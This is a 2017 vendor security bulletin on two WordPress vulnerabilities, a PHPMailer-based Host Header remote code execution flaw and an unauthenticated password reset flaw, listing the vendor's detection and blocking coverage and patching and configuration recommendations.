Follow

05/08/17: WordPress Host Header RCE (via CVE-2016-10033) and Password Reset (CVE-2017-8295) Exploits | Security Bulletin

Overview

There are two new exploits for WordPress, a popular open-source Content Management System based on PHP and SQL.  

  • Host Header RCE: WordPress has announced a Proof-of-Concept exploit for a vulnerability in WordPress core, which allows passing of a malicious code as a parameter to PHPMailer, a mail library often deployed alongside WordPress. This code then leverages CVE-2016-10033 within PHPMailer to cause the local Mail Transfer Agent to execute on the server and allow attackers to assume control of the victim's website and execute their own code. 

    More information about this exploit is available from ExploitBox here: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

  • CVE-2017-8295: WordPress has announced a Proof-of-Concept for a vulnerability in the password reset feature in WordPress, which can help attackers get a password reset link without previous authentication. This is a targeted attack that helps the attacker gain unauthorized access to the victim’s WordPress account.

    More information about this exploit is available from ExploitBox here: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

Alert Logic Coverage

Alert Logic has evaluated its customer base for exposure to the exploit and has developed signatures for detecting the threat depending on the security service in place. We are continuing to refine our detection capabilities and updates may be available in the future within this article.

To keep up to date with coverage information for this threat, click Sign In at the top of this page and sign in to Help Center using your credentials for the Alert Logic UI. Then click Follow at the top, right corner of this article. By following the article, you will receive email alerts when the content of the article is updated.

Host Header RCE

Cloud Defender

  • For customers using Alert Logic out-of-bound (OOB) Web Security Manager, a new header validation signature to detect the exploit has been added to security policies.

  • For customers using Alert Logic inline Web Security Manager, a new header validation signature to detect and block the exploit has been added to security policies. This attack is blocked even when the WAF is in detect mode.

  • The Network-based Intrusion Detection System (IDS) has been updated with new signatures for this exploit. These signatures are actively being assessed by our Security Operations Center (SOC) team for consideration of incident generation.

  • Vulnerability scanning has been updated to identify this vulnerability. To check your environment for this vulnerability, schedule a scan in the Alert Logic user interface (UI).

Threat Manager

  • The Network-based IDS has been updated with new signatures for this exploit. These signatures are actively being assessed by our SOC team for consideration of incident generation.

  • Vulnerability scanning has been updated to identify this vulnerability. To check your environment for this vulnerability, schedule a scan in the Alert Logic UI.

Recommendations 

  1. If you are running WordPress version 4.6 or lesser, upgrade to WordPress 4.7.4 (or at a minimum to 4.7).

  2. Upgrade PHPMailer to the latest version (5.2.18) in your WordPress installation.

  3. Follow this article and watch the Alert Logic blog for further updates.

CVE-2017-8295

Cloud Defender

  • For customers using Alert Logic inline Web Security Manager Premier, the request will be blocked, since the host name in the HTTP request is a virtual host.

    Note: The only exception to this blocking is if one of your website security profiles is configured to have a proxy/website that is used for requests for unknown host names. 

Recommendations

  1. If you are running WordPress version 4.6 or lesser, upgrade to WordPress 4.7.4 (or at a minimum to 4.7).

  2. Turn on UseCanonicalName to force a static SERVER_NAME value in your WordPress server.

  3. Follow this article and watch the Alert Logic blog for further updates.

Contacting Alert Logic

If you have questions about Alert Logic coverage for these threats, contact our Support team using the following contact information.

US: 877.484.8383 (Option 2)

UK: +44 (0) 203 011 5533 (Option 2)

support@alertlogic.com

 

Was this article helpful?
0 out of 0 found this helpful
Have more questions? Submit a request

0 Comments

Please sign in to leave a comment.